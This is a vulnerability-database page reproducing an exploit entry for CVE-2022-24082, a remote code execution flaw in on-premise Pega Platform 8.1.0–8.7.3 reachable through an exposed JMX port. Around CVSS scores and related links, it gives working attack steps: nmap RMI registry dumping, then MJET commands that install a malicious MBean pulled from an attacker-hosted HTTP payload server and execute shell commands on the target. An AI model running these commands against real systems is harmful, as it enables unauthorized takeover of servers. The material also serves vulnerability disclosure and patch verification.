Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMarcin Wolak1337DAY-ID-38047
HistoryOct 24, 2022 - 12:00 a.m.

Pega Platform 8.7.3 Remote Code Execution Vulnerability

2022-10-2400:00:00
Marcin Wolak
0day.today
290
pega platform 8.7.3
remote code execution
marcin wolak
mogwai labs jmx exploitation toolkit
rmi registry
red hat enterprise
cve-2022-24082
jvm
jython
mbean
http payload
technical details.

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.016 Low

EPSS

Percentile

87.3%

JSON

Pega Platform versions 8.1.0 through 8.7.3 suffer from a remote code execution vulnerability. If an on-premise installation of the Pega Platform is configured with the port for the JMX interface exposed to the Internet and port filtering is not properly configured, then it may be possible to upload serialized payloads to attack the underlying system. This does not affect systems running on PegaCloud due to its design and architecture.

# Exploit Title: Pega Platform 8.1.0 (and higher) Remote Code Execution
# Google Dork: N/A
# Date: 20 Oct 2022
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
# Vendor Homepage: www.pega.com
# Software Link: Not Available
# Version: 8.1.0 on-premise and higher, up to 8.7.3
# Tested on: Red Hat Enterprise 7
# CVE : CVE-2022-24082

;Dumping RMI registry:
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>

;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1:<PORT>)
;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI dump, but actually listens on the network as well):
nmap -sT -sV -p <PORT> <IP Address>

;Exploitation requires:
;- JVM
;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
;- jython
;Installing mbean for remote code execution
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 install random_password http://<Local IP to Serve Payload over HTTP>:6666 6666

;Execution of commands id & ifconfig
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 command random_password "id;ifconfig"

;More details: https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316

Related

packetstorm 1
cvelist 1
nvd 1
zdt 1
cve 1
prion 1
exploitdb 1
packetstorm
packetstorm
Pega Platform 8.7.3 Remote Code Execution
2022-10-24 00:00:00
cvelist
cvelist
CVE-2022-24082
2022-07-19 00:00:00
nvd
nvd
CVE-2022-24082
2022-07-19 15:15:08
zdt
zdt
Pega Platform 8.1.0 - Remote Code Execution Vulnerability
2023-03-28 00:00:00
cve
cve
CVE-2022-24082
2022-07-19 15:15:08
prion
prion
Design/Logic Flaw
2022-07-19 15:15:00
exploitdb
exploitdb
Pega Platform 8.1.0 - Remote Code Execution (RCE)
2023-03-28 00:00:00

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.016 Low

EPSS

Percentile

87.3%

JSON
Related for 1337DAY-ID-38047
packetstorm1cvelist1nvd1zdt1cve1prion1exploitdb1